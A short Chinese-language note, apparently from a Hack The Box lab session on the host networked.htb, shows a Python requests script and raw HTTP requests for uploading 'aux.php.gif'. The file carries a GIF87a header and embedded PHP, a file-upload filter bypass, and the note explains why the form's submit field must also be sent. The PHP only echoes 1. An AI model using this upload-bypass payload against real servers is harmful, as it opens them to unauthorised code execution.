Python 文件上传

截屏2021-12-15 18.57.24.png

def upload_fileEx(filename: str) -> None:
    # files = { "myFile": (filename, open(EXPLOIT, "rb"), "image/png") }
    files = [("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")), ("submit", (None, "go!"))]
    proxy = { "http": "http://127.0.0.1:8080" }

    r = requests.post(url, files=files, proxies=proxy)
    print(r.text)


if __name__ == '__main__':
    upload_fileEx("aux.php.gif")

---

就是一个很简单的提交表单

<form action="/upload.php" method="post" enctype="multipart/form-data">
 <input type="file" name="myFile">
 <br>
<input type="submit" name="submit" value="go!">
</form>

这是一开始的代码，然后失败了：

files = { "myFile": (filename, r"GIF87a<?php echo(1); ?>", "image/gif") }
r = requests.post(url, files=files, proxies=proxy)

请求头

POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 197
Content-Type: multipart/form-data; boundary=acba2ede0fd10bf0502358f99d6d20f3

--acba2ede0fd10bf0502358f99d6d20f3
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif

GIF87a<?php echo(1); ?>
--acba2ede0fd10bf0502358f99d6d20f3--

对比成功上传的请求头

POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 287
Content-Type: multipart/form-data; boundary=20c3527f70dbcd8883630232a349fc35

--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif

GIF87a<?php echo(1); ?>
--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="submit"

go!
--20c3527f70dbcd8883630232a349fc35--

其实是还有一个提交项的

Content-Disposition: form-data; name="submit"

go!
--20c3527f70dbcd8883630232a349fc35--

所以要提交两个文件，一个是要提交的文件，一个是键值对

files = [
    ("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")), 
    ("submit", (None, "go!"))
]